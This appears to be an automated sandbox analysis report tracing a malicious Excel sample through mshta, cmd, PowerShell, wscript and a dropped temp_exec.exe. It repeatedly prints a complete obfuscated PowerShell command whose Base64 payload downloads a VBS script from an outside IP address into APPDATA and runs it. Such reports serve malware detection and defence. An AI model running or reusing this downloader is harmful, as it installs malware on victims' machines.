          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\temp_exec.exe "C:\Users\user\AppData\Local\Temp\temp_exec.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\temp_exec.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
          Source: F7A30000.0.drInitial sample: OLE indicators vbamacros = False
          Source: PI#0034250924.xla.xlsxInitial sample: OLE indicators encrypted = True

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 12.2.temp_exec.exe.2bc9ae0.2.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
          Source: 12.2.temp_exec.exe.8e0000.0.raw.unpack, c4b3fc756b99a7f509fc28017328f4772.cs.Net Code: c4dd2d2143b0e5c59902a3c884b46a00e System.Reflection.Assembly.Load(byte[])
          PowerShell case anomaly found
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"Jump to behavior
          Suspicious command line found
          Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRw